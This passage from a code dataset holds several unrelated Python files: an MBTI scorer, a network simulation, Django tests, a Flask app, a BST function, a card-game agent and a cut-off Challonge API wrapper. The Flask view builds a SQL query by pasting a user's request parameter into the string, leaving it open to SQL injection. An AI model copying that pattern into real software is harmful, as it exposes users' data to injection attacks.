[\"Ti\",\"Ne\",\"Si\",\"Fe\"], # INTP\r\n [\"Ni\",\"Te\",\"Fi\",\"Se\"], # INTJ\r\n [\"Fi\",\"Ne\",\"Si\",\"Te\"], # INFP\r\n [\"Ni\",\"Fe\",\"Ti\",\"Se\"], # INFJ\r\n [\"Ti\",\"Se\",\"Ni\",\"Fe\"], # ISTP\r\n [\"Si\",\"Te\",\"Fi\",\"Ne\"], # ISTJ\r\n [\"Fi\",\"Se\",\"Ni\",\"Te\"], # ISFP\r\n [\"Si\",\"Fe\",\"Ti\",\"Ne\"], # ISFJ\r\n [\"Ne\",\"Ti\",\"Fe\",\"Si\"], # ENTP\r\n [\"Te\",\"Ni\",\"Se\",\"Fi\"], # ENTJ\r\n [\"Ne\",\"Fi\",\"Te\",\"Si\"], # ENFP\r\n [\"Fe\",\"Ni\",\"Se\",\"Ti\"], # ENFJ\r\n [\"Se\",\"Ti\",\"Fe\",\"Ni\"], # ESTP\r\n [\"Te\",\"Si\",\"Ne\",\"Fi\"], # ESTJ\r\n [\"Se\",\"Fi\",\"Te\",\"Ni\"], # ESFP\r\n [\"Fe\",\"Si\",\"Ne\",\"Ti\"] # ESFJ\r\n ]\r\n\r\n # Coefficients of importance\r\n coef = [2, 1.5, 1.25, 1]\r\n # Calculates score for every MBTI type due to it's \"proximity\" with the \"i-th\" function\r\n for i, j in itertools.product(range(16), range(4)):\r\n # sum(score_func[k][1] for k in range(8) if list_typofunc[i][j] == score_func[k][0]) <=> The score of \"j-th\" function of the \"i-th\" MBTI type\r\n list_type[i][1] -= abs(sort_score[7-j] - sum(score_func[k][1] for k in range(8) if list_typofunc[i][j] == score_func[k][0]))*coef[j]\r\n\r\n\r\n # Sorting MBTI type by there score\r\n final_score = sorted(list_type, key = lambda x: x[1])[::-1]\r\n\r\n # Doing the Sum of exponentiel for probability\r\n sumExp = sum( math.exp(final_score[i][1]/10) for i in range(16))\r\n\r\n # Probability list\r\n probability = [str(round(float(100 * math.exp(final_score[i][1]/10)/sumExp),2))+\"%\" for i in range(16)]\r\n\r\n # Final Print\r\n print(\"The Scores are:\\n\\t- \"+\"\\n\\t- 
\".join(final_score[i][0]+f\" : {final_score[i][1]}pts <=> Probability of : {probability[i]}\" for i in range(16)))\r\n\r\n\r\ndef plot(score):\r\n \"\"\"\r\n plot the score\r\n \"\"\"\r\n ################################################################################################################\r\n # P L O T #\r\n ################################################################################################################\r\n x = np.array(list_func) #\r\n y = np.array(score) #\r\n #\r\n plt.bar(x,y, color=['#3480eb','#5b97eb','#40b361','#59c979', '#f2d00c','#ffe657', '#c41837','#c9324e']) #\r\n plt.show() #\r\n ################################################################################################################\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"aderepas/MBTI_Python","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6715,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"69800767285","text":"import random\nfrom constants import *\nfrom node import Node\nimport numpy as np\n\n'''\n\n\tEach device has a start and stop point\n\t\tthey're \"powered on\" at point A (random location on edge of map)\n\t\tthey move to point B (random location on a different edge of map)\n\t\t\tavoiding other nodes along the way\n\t\t\t\tby making node velocity very small, if a node is surrounded by a bunch of nodes and its\n\t\t\t\tvector sum pushes it into a node it will be closer the next time but not NEAR at all\n\t\t\t\tcolliding and now that its closer its new vector sum will push it away from the node\n\t\t\t\tits getting closer to colliding with, and the nodes will never collide with each other\n\t\tthen they \"shut down\" at point B\n\n\t\tThis causes the networks the devices form to:\n\t\t\tgrow\n\t\t\tshrink\n\t\t\tsplit\n\t\t\tmerge\n\t\twhich makes the simulation much more realistic\n\t'''\n\n\nclass Device(object):\n\n\tdef __init__(self, devices, t, ping_periodically):\n\n\t\tself.src, self.dst = self.set_source_and_destination(devices)\n\t\tself.vel = self.set_velocity()\n\t\t# print('src = (%.4f, %.4f)' % (self.src[0], self.src[1]))\n\t\tself.n = Node(self.src[0], self.src[1], t, ping_periodically, grid=False)\n\t\tself.num = self.set_num(devices) # unique int from all the other devices\n\n\n\t\tself.sent_messages = [] # messages sent this time step\n\t\tself.message_dist = None\n\t\tself.ping_dist = None\n\t\tself.echo_dist = None\n\t\tself.most_recent_message_type = None\n\n\n\tdef main_loop(self, t, verbose=False):\n\n\t\tself.sent_messages, update_console_display = \\\n\t\t\tself.n.main_loop(t, verbose=verbose)\n\n\t\treturn self.sent_messages, update_console_display\n\n\tdef set_source_and_destination(self, devices):\n\n\t\t# pick a random side of the map to start the device at\n\t\tsides = ['left', 'right', 'top', 'bottom']\n\t\tsrc_side = random.choice(sides)\n\n\t\t# pick a random point on that side and start the device there\n\t\tsrc = None\n\t\twhile src == None:\n\t\t\tif src_side == 'left': src = (0, H * random.uniform(0, 1))\n\t\t\tif src_side == 'right': src = (W, H * random.uniform(0, 1))\n\t\t\tif src_side == 'top':\t src = (W * random.uniform(0, 1), H)\n\t\t\tif src_side == 'bottom': src = (W * random.uniform(0, 1), 0)\n\t\t\tfor d in devices:\n\t\t\t\tif d.n.x == src[0] and d.n.y == src[1]:\n\t\t\t\t\tsrc = None\n\t\t\t\t\tbreak\n\n\t\t# pick the opposite side for the dst\n\t\tif src_side == 'left': dst_side = 'right'\n\t\tif src_side == 
'right': dst_side = 'left'\n\t\tif src_side == 'top':\t dst_side = 'bottom'\n\t\tif src_side == 'bottom': dst_side = 'top'\n\t\t# # pick a random other side\n\t\t# sides.remove(src_side)\n\t\t# dst_side = random.choice(sides)\n\n\t\t# pick a random point on that side and set the dst there\n\t\tif dst_side == 'left': dst = (0, H * random.uniform(0, 1))\n\t\tif dst_side == 'right': dst = (W, H * random.uniform(0, 1))\n\t\tif dst_side == 'top': dst = (W * random.uniform(0, 1), H)\n\t\tif dst_side == 'bottom': dst = (W * random.uniform(0, 1), 0)\n\n\t\treturn src, dst\n\n\tdef set_velocity(self):\n\t\tvel = random.gauss(AVG_VEL, STD_DEV_VEL) # normal distribution\n\t\tvel = MIN_VEL if vel < MIN_VEL else vel\n\t\tvel = MAX_VEL if vel > MAX_VEL else vel\n\t\treturn vel\n\n\tdef set_num(self, devices):\n\n\t\t# find minimum positive integer this device could have\n\t\tnum = 0\n\t\twhile num in list(map(lambda d : d.num, devices)):\n\t\t\tnum += 1\n\t\treturn num\n\n\tdef reached_dst(self):\n\t\tdst_dist = math.sqrt((self.n.x - self.dst[0])**2 + (self.n.y - self.dst[1])**2)\n\t\treturn dst_dist <= MAX_DST_DIST\n\n\tdef move(self, close_devices, verbose=False):\n\t\t# print('\\n\\n\\n')\n\t\tx, y = self.n.x, self.n.y\n\t\t# print('(x, y) = (%.4f, %.4f)' % (x, y))\n\t\t# print('self.dst = (%.4f, %.4f)' % (self.dst[0], self.dst[1]))\n\t\tdx, dy = self.dst[0]-x, self.dst[1]-y # x and y dist to dst\n\t\t# print('(dx, dy) = (%.4f, %.4f)' % (dx, dy))\n\t\tdst_dist = math.sqrt(dx**2 + dy**2) # distance to destination\n\t\ttheta0 = np.arctan2(dy, dx) # v0 = angle to dst\n\t\t# print('theta0 = %.4f' % theta0)\n\t\tmag = min(self.vel, dst_dist)\n\t\t# print('mag = min(self.vel, dst_dist) = min(%.4f, %.4f) = %.4f' % (self.vel, dst_dist, mag))\n\t\tv0 = (mag * np.cos(theta0), mag * np.sin(theta0)) # v0 = vector to destination\n\t\tv_sum = v0\n\t\t# print('v0\t= (%.4f, %.4f)' % (v_sum[0], v_sum[1]))\n\t\tfor d, dist in close_devices.items():\n\t\t\ttheta = np.arctan2(d.n.y-y, d.n.x-x) + np.pi\n\t\t\tmag = 0.0025 * float(1 / dist)\n\t\t\t# print('dist = %.4f mag = %.4f theta = %.4f' % (dist, mag, theta))\n\t\t\tv = (mag * np.cos(theta), mag * np.sin(theta)) # v0 = vector to destination\n\t\t\t# print('v = (%.4f, %4f)' % (v[0], v[1]))\n\t\t\tv_sum = (v_sum[0] + v[0], v_sum[1] + v[1])\n\t\tmag = math.sqrt(v_sum[0]**2 + v_sum[1]**2)\n\t\t# print('mag = %.4f' % mag)\n\t\tif mag > MAX_VEL:\n\t\t\ttheta = np.arctan2(v_sum[1], v_sum[0])\n\t\t\tv_sum = (MAX_VEL * np.cos(theta), MAX_VEL * np.sin(theta))\n\t\t# print('v_sum = (%.4f, %.4f)' % (v_sum[0], v_sum[1]))\n\t\tself.n.x += v_sum[0]\n\t\tself.n.y += v_sum[1]\n\t\tif self.n.x < 0: self.n.x = 0\n\t\tif self.n.x > W: self.n.x = W\n\t\tif self.n.y < 0: self.n.y = 0\n\t\tif self.n.y > W: self.n.y = H\n\t\treturn self.reached_dst()\n\n\tdef print_d(self, num_devices='?', i='?', start_space='\t', newline_start=False):\n\n\t\tself.n.print_n(num_nodes=num_devices, i=i, start_space=start_space, newline_start=newline_start)\n\n\n","repo_name":"LukeDickerson19/basic-network-simulation","sub_path":"src/device.py","file_name":"device.py","file_ext":"py","file_size_in_byte":5120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"28136237256","text":"from django.test import TestCase\nfrom django.test import Client\nfrom django.urls import reverse\nfrom tests.factories.gbe_factories import (\n BioFactory,\n ClassFactory,\n ConferenceFactory,\n ProfileFactory,\n)\nfrom tests.factories.scheduler_factories import 
SchedEventFactory\nfrom tests.functions.gbe_functions import (\n grant_privilege,\n is_login_page,\n login_as,\n)\nfrom gbe.models import BidEvaluation\nfrom scheduler.models import Event as sEvent\n\n\nclass TestReviewClass(TestCase):\n '''Tests for review_class view'''\n view_name = 'class_review'\n\n @classmethod\n def setUpTestData(cls):\n cls.performer = BioFactory()\n cls.privileged_profile = ProfileFactory()\n cls.privileged_user = cls.privileged_profile.user_object\n grant_privilege(cls.privileged_user, 'Class Reviewers')\n grant_privilege(cls.privileged_user, 'Class Coordinator')\n\n def setUp(self):\n self.client = Client()\n\n def get_post_data(self, bid, reviewer=None):\n reviewer = reviewer or self.privileged_profile\n return {'vote': 3,\n 'notes': \"blah blah\",\n 'evaluator': reviewer.pk,\n 'bid': bid.pk}\n\n def test_review_class_all_well(self):\n klass = ClassFactory()\n url = reverse(self.view_name,\n args=[klass.pk],\n urlconf='gbe.urls')\n\n login_as(self.privileged_user, self)\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)\n self.assertContains(response, 'Review Class')\n self.assertContains(response, \"Class Proposal\")\n self.assertContains(response, \"Set Class State\")\n self.assertNotContains(response, 'name=\"extra_button\"')\n self.assertContains(response, self.performer.year_started)\n\n def test_review_class_w_scheduling(self):\n grant_privilege(self.privileged_user, 'Scheduling Mavens')\n klass = ClassFactory()\n url = reverse(self.view_name,\n args=[klass.pk],\n urlconf='gbe.urls')\n\n login_as(self.privileged_user, self)\n response = self.client.get(url)\n self.assertContains(response, 'name=\"extra_button\"')\n\n def test_review_class_post_form_invalid(self):\n klass = ClassFactory()\n url = reverse(self.view_name,\n args=[klass.pk],\n urlconf='gbe.urls')\n\n login_as(self.privileged_user, self)\n response = self.client.post(url,\n data={'accepted': 1})\n self.assertEqual(response.status_code, 200)\n self.assertContains(response, 'Review Class')\n\n def test_review_class_post_form_valid_creates_evaluation(self):\n klass = ClassFactory()\n url = reverse(self.view_name,\n args=[klass.pk],\n urlconf='gbe.urls')\n profile = self.privileged_user.profile\n pre_execute_count = BidEvaluation.objects.filter(\n evaluator=profile,\n bid=klass).count()\n login_as(self.privileged_user, self)\n data = self.get_post_data(klass)\n response = self.client.post(url,\n data,\n follow=True)\n self.assertEqual(response.status_code, 200)\n self.assertContains(response, 'Review Class')\n post_execute_count = BidEvaluation.objects.filter(\n evaluator=profile,\n bid=klass).count()\n assert post_execute_count == pre_execute_count + 1\n\n def test_review_class_valid_post_evaluation_has_correct_vote(self):\n klass = ClassFactory()\n url = reverse(self.view_name,\n args=[klass.pk],\n urlconf='gbe.urls')\n profile = self.privileged_user.profile\n login_as(self.privileged_user, self)\n data = self.get_post_data(klass)\n response = self.client.post(url,\n data,\n follow=True)\n self.assertEqual(response.status_code, 200)\n self.assertContains(response, 'Review Class')\n evaluation = BidEvaluation.objects.filter(\n evaluator=profile,\n bid=klass).last()\n assert evaluation.vote == data['vote']\n\n def test_review_class_past_conference(self):\n klass = ClassFactory()\n klass.b_conference.status = 'completed'\n klass.b_conference.save()\n url = reverse(self.view_name, args=[klass.pk], urlconf=\"gbe.urls\")\n login_as(self.privileged_user, self)\n response = 
self.client.get(url, follow=True)\n self.assertRedirects(\n response,\n reverse('class_view',\n urlconf='gbe.urls',\n args=[klass.pk]))\n self.assertContains(response, 'Review Class')\n self.assertNotContains(response, 'Review Information')\n\n def test_no_login_gives_error(self):\n url = reverse(self.view_name, args=[1], urlconf=\"gbe.urls\")\n response = self.client.get(url, follow=True)\n redirect_url = reverse('login') + \"?next=\" + url\n self.assertRedirects(response, redirect_url)\n self.assertTrue(is_login_page(response))\n\n def test_basic_user(self):\n klass = ClassFactory()\n reviewer = ProfileFactory()\n grant_privilege(reviewer, 'Class Reviewers')\n login_as(reviewer, self)\n url = reverse(self.view_name, args=[klass.pk], urlconf=\"gbe.urls\")\n response = self.client.get(url)\n self.assertContains(response, \"Class Proposal\")\n assert response.status_code == 200\n\n def test_review_class_no_how_heard(self):\n klass = ClassFactory()\n klass.teacher_bio.contact.how_heard = '[]'\n klass.teacher_bio.contact.save()\n url = reverse(self.view_name,\n args=[klass.pk],\n urlconf='gbe.urls')\n\n login_as(self.privileged_user, self)\n response = self.client.get(url)\n self.assertNotContains(response, '[]')\n self.assertContains(response, \"The Presenter\")\n\n def test_review_class_how_heard_is_present(self):\n klass = ClassFactory()\n klass.teacher_bio.contact.how_heard = \"[u'Facebook']\"\n klass.teacher_bio.contact.save()\n url = reverse(self.view_name,\n args=[klass.pk],\n urlconf='gbe.urls')\n\n login_as(self.privileged_user, self)\n response = self.client.get(url)\n self.assertContains(response, 'Facebook')\n","repo_name":"bethlakshmi/gbe-divio-djangocms-python2.7","sub_path":"tests/gbe/test_review_class.py","file_name":"test_review_class.py","file_ext":"py","file_size_in_byte":6590,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"76"} +{"seq_id":"28776831031","text":"from flask import render_template\nfrom flask import request\nfrom flaskexample import app\nfrom sqlalchemy import create_engine\nfrom sqlalchemy_utils import database_exists, create_database\nimport pandas as pd\nimport psycopg2\n\n\nfrom utilTy import find_best_data\nfrom a_Model import ModelIt\n\nuser = 'tyyano' #add your username here (same as previous postgreSQL)\n\nhost = 'localhost'\ndbname = 'demo2_db'\ndb = create_engine('postgres://%s%s/%s'%(user,host,dbname))\ncon = None\ncon = psycopg2.connect(database = dbname, user = user)\n\n\n@app.route('/')\n@app.route('/index')\ndef index():\n user = { 'nickname': 'Twtytee' } # fake user\n return render_template(\"index.html\", title = 'Home', user = user) \n\n\n@app.route('/mock')\ndef mock():\n return render_template(\"mock.html\") \n\n@app.route('/inputfuncy')\ndef funcy_input():\n return render_template(\"inputfuncy.html\")\n\n@app.route('/outputfuncy')\ndef funcy_output():\n\t#pull 'issue' from input field and store it\n\tissue_val = request.args.get('issue')\n\t#select ---- from the ---- dtabase for --- the user inputs\n\tif issue_val == \"Any Issues\":\n\t\tquery = \"SELECT index, created_at, handle,twt_url, text_std, log_odds, lc FROM demo_data_table WHERE likely='LIKELY'\"\n\telse:\n\t\tquery = \"SELECT index, created_at, handle,twt_url, text_std, log_odds, lc FROM demo_data_table WHERE likely='LIKELY' AND issue='%s'\" % issue_val \n\tprint(query)\n\tquery_results=pd.read_sql_query(query,con)\n\t#print(query_results)\n\tliberal = []\n\tconserv = []\n\tbirths = []\n\tbirths_refined = []\n\n\t# order by the date 
\n\tfor i in range(0,query_results.shape[0]):\n\t\tdateStrOrg = query_results.iloc[i]['created_at']\n\t\tdateStr = query_results.iloc[i]['created_at'].split()[0]\n\t\tdateStr = ''.join(dateStr.split('-'))\n\t\tdateInt = int(dateStr)\n\t\thandleStr = query_results.iloc[i]['handle']\n\t\ttwt_url_str = query_results.iloc[i]['twt_url']\n\t\tlc_str = query_results.iloc[i]['lc']\n\t\tidx_str = query_results.iloc[i]['index']\n\t\tlog_odds_str = query_results.iloc[i]['log_odds']\n\t\tlog_odds_float = float(query_results.iloc[i]['log_odds'])\n\t\ttxt_str =query_results.iloc[i]['text_std']\n\n\t\tcolor = \"blue\"\n\t\tif lc_str == 'Conservative':\n\t\t\tcolor = \"red\"\n\n\t\tif (lc_str =='Liberal'):\n\t\t\tliberal.append((idx_str, log_odds_float, dateInt))\n\t\telse:\n\t\t\tconserv.append((idx_str, log_odds_float, dateInt))\n\t\tbirths.append(dict(index=idx_str, created_at=dateStrOrg, handle=handleStr, twt_url=twt_url_str, \\\n\t\t\ttext_std=txt_str, log_odds=log_odds_str, lc=lc_str, color=color))\n\n\t#sort the tuple by date and log odds value \n\tliberal_idx = find_best_data(liberal, 7)\n\tconserv_idx = find_best_data(conserv, 7)\n\n\t# return only equal number of liberal and conservative;\n\t# odds number is liberal, even number is conservative\n\tlimit = min(len(liberal_idx), len(conserv_idx))\n\tliberal_idx = liberal_idx[:limit]\n\tconserv_idx = conserv_idx[:limit]\n\n\tbirth_liberal = []\n\tbirth_conserv = []\n\tfor x in births:\n\t\tif x['index'] in liberal_idx:\n\t\t\tbirth_liberal.append(x)\n\t\telif x['index'] in conserv_idx: \n\t\t\tbirth_conserv.append(x)\n\n\tfor i in range(limit):\n\t\tbirths_refined.append((birth_liberal[i], birth_conserv[i]))\n\n\tthe_result = ModelIt(issue_val,births)\n\n\treturn render_template(\"outputfuncy.html\", births = births_refined, the_result = the_result, inputVal = issue_val)\n","repo_name":"twtytee/twtytee.github.io","sub_path":"TY_demo/flaskexample/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"2800256993","text":"# 이진 탐색 트리 노드 간 최소 거리\n\ndef minDiffInBST(root):\n prev = - int(1e9)\n result = int(1e9)\n\n stack = []\n node = root\n\n while stack or node:\n while node:\n stack.append(node)\n node = node.left\n\n node = stack.pop()\n result = min(result, node.val - prev)\n prev = node.val\n\n node = node.right","repo_name":"minsoo9506/computer-science-study","sub_path":"[Data Structure] python algorithm interview/Chap14 트리/53.py","file_name":"53.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"17443925734","text":"import csv\nimport os\nimport json\nimport random\nfrom pprint import pprint\nfrom Bot import Bot\nfrom importSVM import import_model\nimport sys\n\nclass LearningAgent(Bot):\n\n def __init__(self):\n self.combinations = dict()\n self.preferences = list()\n self.lookup_table = dict()\n self.card_features = dict()\n self.global_order = dict()\n\n #Processing DataSet\n def select_card(self, black_card, *white_cards):\n\n better_card = 0\n better_position = -sys.maxsize - 1\n\n for white_card in list(white_cards):\n #Get the combo key and look into the translation\n combo_id = self.lookup_table[self.__generate_combo_key(black_card, white_card)]\n combo_features = self.combinations[combo_id]\n print(combo_features)\n #TODO: Know what is in the keys in global order\n\n combo_position = 
self.global_order[combo_features]\n if(combo_position < better_position):\n better_card = white_card\n better_position = combo_position\n\n return better_card\n\n def __get_card_features(self, card_key):\n return self.card_features[card_key]\n\n def learn_from_model(self, rank_svm_model):\n #Import from Phil Lopes code\n self.global_order = import_model(rank_svm_model,'all_data.csv') #this should be assigned to a variable\n\n def process_and_save_data(self, data_path, cards_path, combination_path, preference_path):\n comb, pref, lookup, card_features = self.__process_data(data_path, cards_path)\n\n # Print some info for testing\n print('number of combinations: ' + str(len(comb)))\n print('number of pref: ' + str(len(pref)))\n print('number of distinct preferences: ' + str(len(set(pref))))\n\n # Create combinations file\n with open(combination_path, 'w') as f:\n id, card = random.choice(list(card_features.items()))\n black_features_name = ['b_{0}'.format(i) for i in card.keys()]\n white_features_name = ['w_{0}'.format(i) for i in card.keys()]\n f.write(\"{0},{1},{2}\\n\".format('ID', ','.join(black_features_name), ','.join(white_features_name)))\n for key, value in comb.items():\n feature_string = \",\".join(map(str, value))\n f.write(\"{0},{1}\\n\".format(key, feature_string))\n\n # Create preference file\n with open(preference_path, 'w') as f:\n for pref in pref:\n f.write(\"{0}\\n\".format(pref))\n\n def __generate_combo_key(self, black, white):\n return black + ' ' + white\n\n def __process_data(self, data_path, cards_path):\n\n #Get the cards features\n with open(cards_path, 'r') as card_file:\n\n card_data = json.load(card_file)\n for id, card in card_data['blackCards'].items():\n self.card_features[id] = card[\"features\"]\n\n for id, card in card_data['whiteCards'].items():\n self.card_features[id] = card[\"features\"]\n\n #Create all possible combinations\n with open(cards_path, 'r') as card_file:\n card_data = json.load(card_file)\n\n #Update lookup table and combination\n lookup_table_id = 0\n for b_id, b_card in card_data['blackCards'].items():\n for w_id, w_card in card_data['whiteCards'].items():\n\n #Create lookup entry\n combined_card_name = self.__generate_combo_key(b_id, w_id)\n self.lookup_table[combined_card_name] = lookup_table_id\n lookup_table_id += 1\n\n #Create the combination feature\n combined_features = list(self.card_features[b_id].values()) + list(self.card_features[w_id].values())\n self.combinations[self.lookup_table[combined_card_name]] = combined_features\n\n #Process the playing hands\n with open(data_path, 'r') as csv_file:\n csv_stream = csv.reader(csv_file, delimiter =',')\n\n n_row = 0\n\n for row in csv_stream:\n if n_row == 0:\n #This is a header\n print('THIS IS A HEADER')\n else:\n black_card = row[2]\n best_white_card = row[3]\n worst_white_card = row[4]\n\n best_card_key = self.__generate_combo_key(black_card, best_white_card)\n worst_card_key = self.__generate_combo_key(black_card, worst_white_card)\n\n best_card_combo_id = self.lookup_table[best_card_key]\n worst_card_combo_id = self.lookup_table[worst_card_key]\n self.preferences.append(str(best_card_combo_id) + ',' + str(worst_card_combo_id))\n\n n_row += 1\n\n return self.combinations, self.preferences, self.lookup_table, self.card_features\n","repo_name":"GameAISchool2018members/bah","sub_path":"LearningAgent.py","file_name":"LearningAgent.py","file_ext":"py","file_size_in_byte":4921,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} 
+{"seq_id":"22847936601","text":"import requests\nimport re\nfrom urllib.parse import urlencode\nimport datetime\n\nfrom tournament import Tournament\nfrom _data_management import _prepare_params\nfrom _enums import TournamentType, TournamentRankedBy, TournamentGrandFinalModifier\nfrom _errors import *\n\n\nBASE_LINK = \"https://api.challonge.com/v1/\"\n\n\n# A wrapper for all tournament related API calls.\nclass Tournaments:\n def __init__(self, auth_info):\n self.auth_info = auth_info\n self.base_link = BASE_LINK\n\n # Retrieves all tournaments visible to an account.\n def get_all(self, state = None, tournament_type = None, created_after = None, created_before = None, subdomain = None):\n req_url = self.base_link + f\"tournaments.json\"\n\n data = {}\n\n if state:\n if not isinstance(state, TournamentState):\n try:\n state = TournamentState(state)\n except:\n raise BadArgument(f\"Parameter `state` is invalid, valid Types: {', '.join(['`{}`'.format(i.value) for i in list(TournamentState)])}\")\n\n data['state'] = state.name\n\n if tournament_type:\n if not isinstance(tournament_type, TournamentType):\n try:\n tournament_type = TournamentType(tournament_type)\n except:\n raise BadArgument(f\"Parameter `tournament_type` is invalid, valid Types: {', '.join(['`{}`'.format(i.value) for i in list(TournamentType)])}\")\n\n data['state'] = state.name\n\n if created_after:\n if isinstance(created_after, datetime.datetime):\n created_after = created_after.strftime('%Y-%m-%d')\n else:\n try:\n datetime.datetime.strptime(created_after, '%Y-%m-%d')\n created_after = created_after.strftime('%Y-%m-%d')\n except:\n raise BadArgument(f\"Parameter `created_after` must be a `datetime.datetime` object or a string in the format `YYYY-MM-DD`\")\n data['created_after'] = created_after\n\n if created_before:\n if isinstance(created_before, datetime.datetime):\n created_before = created_before.strftime('%Y-%m-%d')\n else:\n try:\n datetime.datetime.strptime(created_before, '%Y-%m-%d')\n created_before = created_before.strftime('%Y-%m-%d')\n except:\n raise BadArgument(f\"Parameter `created_before` must be a `datetime.datetime` object or a string in the format `YYYY-MM-DD`\")\n data['created_before'] = created_before\n\n if subdomain:\n if not isinstance(subdomain, str):\n raise BadArgument(f\"Parameter `subdomain` must be of type str\")\n if len(subdomain) > 60:\n raise BadArgument('Parameter `subdomain` cannot be more than 60 characters')\n patterns = '^[a-zA-Z0-9_]*$'\n if not re.search(patterns, subdomain):\n raise BadArgument('Parameter `subdomain` can only be letters, numbers, and underscores')\n data['subdomain'] = subdomain\n\n url_params = \"\"\n if len(data.keys()) > 0:\n url_params = \"?\" + urlencode(_prepare_params(data))\n\n req = requests.get(req_url, auth = self.auth_info)\n if not req.status_code == 200:\n raise HTTPException(req.status_code)\n else:\n return [Tournament(tournament_data, self.base_link, self.auth_info) for tournament_data in req.json()]\n\n # Retrieves a specific tournament by ID\n def get(self, id, include_participants = False, include_matches = False):\n req_url = self.base_link + f\"tournaments/{id}.json\"\n\n data = {\n \"include_participants\": int(include_participants),\n \"include_matches\": int(include_matches)\n }\n\n url_params = '?' 
+ urlencode(_prepare_params(data))\n\n req = requests.get(req_url + url_params, auth = self.auth_info)\n if not req.status_code == 200:\n raise HTTPException(req.status_code)\n else:\n return Tournament(req.json(), self.base_link, self.auth_info)\n\n # Create a tournament.\n def create(self, name, url, tournament_type = TournamentType('single elimination'),\n subdomain = None, description = None, open_signup = None, hold_third_place_match = None,\n pts_for_match_win = None, pts_for_match_tie = None, pts_for_game_win = None, pts_for_game_tie = None,\n swiss_rounds = None, pts_for_bye = None, ranked_by = None, rr_pts_for_match_win = None,\n rr_pts_for_match_tie = None, rr_pts_for_game_win = None, rr_pts_for_game_tie = None,\n accept_attachments = None, hide_forum = None, show_rounds = None, private = None,\n notify_users_when_matches_open = None, notify_users_when_the_tournament_ends = None,\n sequential_pairings = None, signup_cap = None, start_at = None, check_in_duration = None,\n grand_finals_modifier = None):\n req_url = self.base_link + \"tournaments.json\"\n\n data = {}\n\n if not isinstance(name, str):\n raise BadArgument('Parameter `name` must be of type str')\n if len(name) > 60:\n raise BadArgument('Parameter `name` cannot be more than 60 characters')\n data['name'] = name\n\n if not isinstance(url, str):\n raise BadArgument('Parameter `url` must be of type str')\n if len(url) > 60:\n raise BadArgument('Parameter `url` cannot be more than 60 characters')\n patterns = '^[a-zA-Z0-9_]*$'\n if not re.search(patterns, url):\n raise BadArgument('Parameter `url` can only be letters, numbers, and underscores')\n data['url'] = url\n\n if not isinstance(tournament_type, TournamentType):\n try:\n tournament_type = TournamentType(tournament_type)\n except:\n raise BadArgument(f\"Parameter `tournament_type` is invalid, valid Types: {', '.join(['`{}`'.format(i.value) for i in list(TournamentType)])}\")\n data['tournament_type'] = tournament_type\n\n if subdomain is not None:\n patterns = '^[a-zA-Z0-9_]*$'\n if not re.search(patterns, subdomain):\n raise BadArgument('Parameter `subdomain` can only be letters, numbers, and underscores')\n else:\n data['subdomain'] = subdomain\n\n if description is not None:\n if not isinstance(description, str):\n raise BadArgument('Parameter `description` must be of type str')\n else:\n data['description'] = description\n\n if open_signup is not None:\n if not isinstance(open_signup, bool):\n raise BadArgument('Parameter `open_signup` must be of type bool')\n else:\n data['open_signup'] = open_signup\n\n if hold_third_place_match is not None:\n if not isinstance(hold_third_place_match, bool):\n raise BadArgument('Parameter `hold_third_place_match` must be of type bool')\n else:\n data['hold_third_place_match'] = hold_third_place_match\n\n if pts_for_match_win is not None:\n if not (isinstance(pts_for_match_win, int) or isinstance(pts_for_match_win, float)):\n raise BadArgument('Parameter `hold_third_place_match` must be of type int or float')\n else:\n pts_for_match_win = round(float(pts_for_match_win), 1)\n data['pts_for_match_win'] = pts_for_match_win\n\n if pts_for_match_tie is not None:\n if not (isinstance(pts_for_match_tie, int) or isinstance(pts_for_match_tie, float)):\n raise BadArgument('Parameter `hold_third_place_match` must be of type int or float')\n else:\n pts_for_match_tie = round(float(pts_for_match_tie), 1)\n data['pts_for_match_tie'] = pts_for_match_tie\n\n if pts_for_game_win is not None:\n if not (isinstance(pts_for_game_win, int) or 
isinstance(pts_for_game_win, float)):\n raise BadArgument('Parameter `hold_third_place_match` must be of type int or float')\n else:\n pts_for_game_win = round(float(pts_for_game_win), 1)\n data['pts_for_game_win'] = pts_for_game_win\n\n if pts_for_game_tie is not None:\n if not (isinstance(pts_for_game_tie, int) or isinstance(pts_for_game_tie, float)):\n raise BadArgument('Parameter `hold_third_place_match` must be of type int or float')\n else:\n pts_for_game_tie = round(float(pts_for_game_tie), 1)\n data['pts_for_game_tie'] = pts_for_game_tie\n\n if rr_pts_for_match_win is not None:\n if not (isinstance(rr_pts_for_match_win, int) or isinstance(rr_pts_for_match_win, float)):\n raise BadArgument('Parameter `hold_third_place_match` must be of type int or float')\n else:\n rr_pts_for_match_win = round(float(rr_pts_for_match_win), 1)\n data['rr_pts_for_match_win'] = rr_pts_for_match_win\n\n if rr_pts_for_match_tie is not None:\n if not (isinstance(rr_pts_for_match_tie, int) or isinstance(rr_pts_for_match_tie, float)):\n raise BadArgument('Parameter `hold_third_place_match` must be of type int or float')\n else:\n rr_pts_for_match_tie = round(float(rr_pts_for_match_tie), 1)\n data['rr_pts_for_match_tie'] = rr_pts_for_match_tie\n\n if rr_pts_for_game_win is not None:\n if not (isinstance(rr_pts_for_game_win, int) or isinstance(rr_pts_for_game_win, float)):\n raise BadArgument('Parameter `hold_third_place_match` must be of type int or float')\n else:\n rr_pts_for_game_win = round(float(rr_pts_for_game_win), 1)\n data['rr_pts_for_game_win'] = rr_pts_for_game_win\n\n if rr_pts_for_game_tie is not None:\n if not (isinstance(rr_pts_for_game_tie, int) or isinstance(rr_pts_for_game_tie, float)):\n raise BadArgument('Parameter `hold_third_place_match` must be of type int or float')\n else:\n rr_pts_for_game_tie = round(float(rr_pts_for_game_tie), 1)\n 